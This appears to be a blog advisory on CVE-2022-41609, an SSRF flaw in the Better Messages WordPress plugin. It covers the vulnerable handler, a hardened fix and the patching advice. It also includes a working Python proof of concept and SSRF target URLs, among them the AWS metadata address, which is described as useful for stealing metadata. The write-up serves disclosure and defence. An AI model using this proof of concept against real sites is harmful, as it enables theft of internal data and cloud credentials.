WordPress powers millions of websites, and plugins extend its features. But what happens if a plugin has a dangerous security flaw? In this post, we’ll break down CVE-2022-41609, a Server-Side Request Forgery (SSRF) flaw in the Better Messages plugin (version 1.9.10.68), explain how it can be exploited by low-privileged users (Subscriber and above), show a proof-of-concept, and explain how you can stay safe.

What Is Better Messages?

Better Messages is a popular messaging/chat system for WordPress. It allows logged-in users to talk to each other within your WordPress site.

What is CVE-2022-41609?

This vulnerability allows a logged-in user (even just a Subscriber) to force the server to make web requests to any URL. This is called SSRF (Server-Side Request Forgery).

Where’s The Bug?

The vulnerability lives in the REST API endpoints handled by the plugin. One of the endpoints lets any subscriber send a request, providing a user-controlled URL. The plugin didn’t properly check if the URL was safe.

Here’s a simplified version of the vulnerable code (ajax.php, old version):

<?php
// Simplified: the AJAX handler takes a user-supplied URL and fetches it
// server-side without checking its scheme, host or resolved address.
if ( $_POST['action'] === 'bm_file_proxy' ) {
    $url      = $_POST['url'];                 // attacker-controlled value
    $response = wp_remote_get( $url );         // the server makes the request
    echo wp_remote_retrieve_body( $response ); // and returns the body to the caller
}

No checks on the URL! If you can send arbitrary URLs, you can force the server to make requests anywhere.
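As an added example (not the plugin’s own code), here is how the same handler could be hardened with WordPress core functions. The hook name, the required capability, the nonce action and the allowed host list are assumptions for illustration:

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// bm_file_proxy handler. Hook/function/capability names are assumptions.

add_action( 'wp_ajax_bm_file_proxy', 'bm_hardened_file_proxy' );

function bm_hardened_file_proxy() {
    // 1. CSRF: require a nonce bound to this action (assumed nonce action name).
    check_ajax_referer( 'bm_file_proxy' );

    // 2. Authorization: a server-side fetch should not be available to every
    //    Subscriber. 'upload_files' is an assumed, more restrictive capability.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $url = isset( $_POST['url'] ) ? esc_url_raw( wp_unslash( $_POST['url'] ) ) : '';

    // 3. Destination allowlist: only the hosts the feature actually needs
    //    (assumed list). This is what really bounds where the server may connect.
    $allowed_hosts = array( 'cdn.example.com' );
    $host          = wp_parse_url( $url, PHP_URL_HOST );
    if ( ! $host || ! in_array( strtolower( $host ), $allowed_hosts, true ) ) {
        wp_send_json_error( 'host not allowed', 400 );
    }

    // 4. wp_safe_remote_get() sets reject_unsafe_urls, so core runs
    //    wp_http_validate_url(): http/https only, no credentials in the URL,
    //    the host is resolved and loopback / RFC 1918 addresses are rejected,
    //    and non-standard ports are refused. redirection => 0 stops an allowed
    //    host from bouncing the request somewhere else.
    $response = wp_safe_remote_get( $url, array(
        'timeout'     => 5,
        'redirection' => 0,
    ) );

    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        wp_send_json_error( 'fetch failed', 502 );
    }

    // 5. Return the body as JSON rather than echoing it raw, so upstream
    //    content can never be rendered as a page on this site's origin.
    wp_send_json_success( array(
        'body' => wp_remote_retrieve_body( $response ),
    ) );
}
```

The core URL validation is defence in depth, not a complete fix on its own: it resolves the name once and the HTTP client resolves it again, so the host allowlist and the capability check are what actually limit the proxy.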

Exploiting CVE-2022-41609: Step-by-Step

Requirements: a logged-in account on the target site, even one with only the Subscriber role.

Step: send a POST request to the vulnerable AJAX handler with the target URL.

Example: SSRF to fetch http://localhost:808/private-data

Here's a Python PoC using requests:

import requests

url = 'https://target-wordpress-site.com/wp-admin/admin-ajax.php'
cookies = {'wordpress_logged_in_xxx': '...'}  # fill with your auth cookies

post_data = {
    'action': 'bm_file_proxy',
    'url': 'http://localhost:808/private-data'
}

r = requests.post(url, data=post_data, cookies=cookies)
print(r.text)

What does this do?
If port 808 is running something internal, this request fetches its content and displays it to the attacker.

Try URLs like:

- http://127...1:3306/
- http://169.254.169.254/latest/meta-data/ (for AWS metadata stealing)

Conclusion

CVE-2022-41609 proves that a simple lack of URL validation can have big consequences, especially in a plugin with thousands of users. SSRF is always serious because it lets attackers use your WordPress site to reach anything on your internal network or the internet, including services that were never meant to be exposed.

If you run Better Messages, you need to update now and regularly review your plugins and their security history.

Timeline

Published on: 11/19/2022 00:15:00 UTC
Last modified on: 11/21/2022 01:29:00 UTC